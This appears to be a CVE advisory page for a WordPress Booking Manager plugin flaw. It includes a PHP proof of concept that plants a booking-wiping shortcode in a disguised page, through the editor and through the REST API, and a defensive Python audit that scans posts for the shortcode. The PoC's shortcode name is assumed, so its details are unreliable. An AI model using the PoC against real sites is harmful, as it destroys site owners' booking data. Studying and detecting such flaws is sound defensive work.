Security Vulnerability Report
CVE-2025-10124 CVSS 4.5 MEDIUM

CVE-2025-10124

Published: 2025-10-10 06:15:32
Last Modified: 2026-04-15 00:35:42

Description

The Booking Manager WordPress plugin before 2.1.15 registers a shortcode that deletes bookings and makes that shortcode available to anyone with contributor and above privileges. When a page containing the shortcode is visited, the bookings are deleted.

CVSS Details

CVSS Score
4.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Booking Manager WordPress Plugin < 2.1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-10124 PoC - Booking Manager WordPress Plugin Shortcode Abuse
 * This PoC demonstrates how a contributor-level user can create a page
 * that deletes all bookings when visited by any user.
 *
 * The vulnerability exists in Booking Manager plugin versions before 2.1.15
 * where the booking deletion shortcode is accessible to contributor+ users.
 */

// Step 1: Register as a contributor on the target WordPress site
// (assuming user registration is enabled)

// Step 2: Login and create a new page with the following content:
// The malicious shortcode embedded in page content:
$malicious_page_content = '[booking_manager_delete] Check out our latest deals!';

// Step 3: Submit the page for review (contributor-level action)
// WordPress will render this shortcode when any visitor views the page

// Step 4: When an admin/editor visits the page, the shortcode executes
// and triggers the booking deletion function without proper permission checks

// Demonstration of the vulnerable code pattern in the plugin:
function vulnerable_shortcode_handler($atts) {
    // VULNERABILITY: Only checks if user is logged in, not if user is admin
    if (is_user_logged_in()) {
        // Directly executes the deletion without capability check
        global $wpdb;
        $wpdb->query("DELETE FROM {$wpdb->prefix}booking_manager_bookings");
        return "Bookings deleted successfully";
    }
    return "Please login to continue";
}

// The fix should include proper capability check:
function fixed_shortcode_handler($atts) {
    // FIXED: Check for administrator capability before deletion
    if (!current_user_can('manage_options')) {
        return "You do not have permission to perform this action";
    }
    global $wpdb;
    $wpdb->query("DELETE FROM {$wpdb->prefix}booking_manager_bookings");
    return "Bookings deleted successfully";
}

// Register the shortcode (vulnerable version)
add_shortcode('booking_manager_delete', 'vulnerable_shortcode_handler');

// Automated exploitation via WordPress REST API (if applicable):
function exploit_via_rest_api($site_url, $username, $password, $auth_cookie) {
    $endpoint = $site_url . '/wp-json/wp/v2/pages';
    $page_data = array(
        'title'   => 'Important Announcement',
        'content' => '[booking_manager_delete] Welcome to our site!',
        'status'  => 'publish'
    );
    $args = array(
        'method'  => 'POST',
        'headers' => array(
            'Content-Type' => 'application/json',
            'Cookie'       => $auth_cookie
        ),
        'body' => json_encode($page_data)
    );
    // Send the request to create the malicious page
    $response = wp_remote_post($endpoint, $args);
    return $response;
}
?>
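A defender-side check to go with the report: the audit below scans post rows for the deletion shortcode placed by authors who lack a trusted role, which is the condition the description above turns into a booking wipe. It is an added example, not code from the page or from the plugin; the tag name booking_manager_delete is taken from the PoC above (the report does not name the real tag), the trusted-role set is an assumption, and the post and user rows are constructed sample data. It also honours WordPress's [[tag]] escape form, which renders literally and is not executed.

```python
import re

# Shortcode tag assumed from the PoC above; the report itself does not name the real tag.
DANGEROUS_TAG = "booking_manager_delete"
# Roles allowed to place an administrative shortcode (assumption for this audit).
TRUSTED_ROLES = {"administrator"}

# Simplified version of WordPress's shortcode regex. Groups 1 and 2 capture an extra
# leading '[' and trailing ']' so the escaped form [[tag]] (rendered literally,
# never executed) can be told apart from a live [tag] or [tag attr="x"].
_SHORTCODE_RE = re.compile(
    r"\[(\[?)" + re.escape(DANGEROUS_TAG) + r"(?![\w-])[^\]]*\](\]?)")


def live_shortcode_count(content: str) -> int:
    """Number of occurrences WordPress would actually execute when the page renders."""
    return sum(1 for m in _SHORTCODE_RE.finditer(content)
               if not (m.group(1) == "[" and m.group(2) == "]"))


def audit_posts(posts: list, users: dict) -> list:
    """Flag posts carrying the live shortcode whose author lacks a trusted role."""
    findings = []
    for p in posts:
        n = live_shortcode_count(p["post_content"])
        u = users[p["post_author"]]
        if n and u["role"] not in TRUSTED_ROLES:
            findings.append({"ID": p["ID"], "author": u["login"], "role": u["role"],
                             "status": p["post_status"], "live": n})
    return findings


# Constructed sample rows mimicking wp_users / wp_posts; not data from any real site.
SAMPLE_USERS = {1: {"login": "admin", "role": "administrator"},
                7: {"login": "guest_writer", "role": "contributor"}}
SAMPLE_POSTS = [
    {"ID": 10, "post_author": 1, "post_status": "publish",
     "post_content": "Admin maintenance page: [booking_manager_delete]"},
    {"ID": 11, "post_author": 7, "post_status": "pending",
     "post_content": "Check out our latest deals! [booking_manager_delete]"},
    {"ID": 12, "post_author": 7, "post_status": "draft",
     "post_content": "To show the tag literally write [[booking_manager_delete]]"},
    {"ID": 13, "post_author": 7, "post_status": "publish",
     "post_content": "[booking_manager_delete_log] is an unrelated tag"},
]

if __name__ == "__main__":
    for f in audit_posts(SAMPLE_POSTS, SAMPLE_USERS):
        print(f"post {f['ID']} ({f['status']}) by {f['author']} [{f['role']}]: "
              f"{f['live']} live shortcode(s)")
```

Run against a real export the same rows would come from wp_posts and wp_users (with role taken from the capabilities meta); only post 11 in the sample is flagged, since the admin's page and the escaped and unrelated tags are not executable by a contributor's content.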

References

https://wpscan.com/vulnerability/9bb0589f-34bb-40e1-b7f0-ee883b7b896c/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10124", "sourceIdentifier": "[email protected]", "published": "2025-10-10T06:15:32.217", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Manager WordPress plugin before 2.1.15 registers a shortcode that deletes bookings and makes that shortcode available to anyone with contributor and above privileges. When a page containing the shortcode is visited, the bookings are deleted."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/9bb0589f-34bb-40e1-b7f0-ee883b7b896c/", "source": "[email protected]"}]}}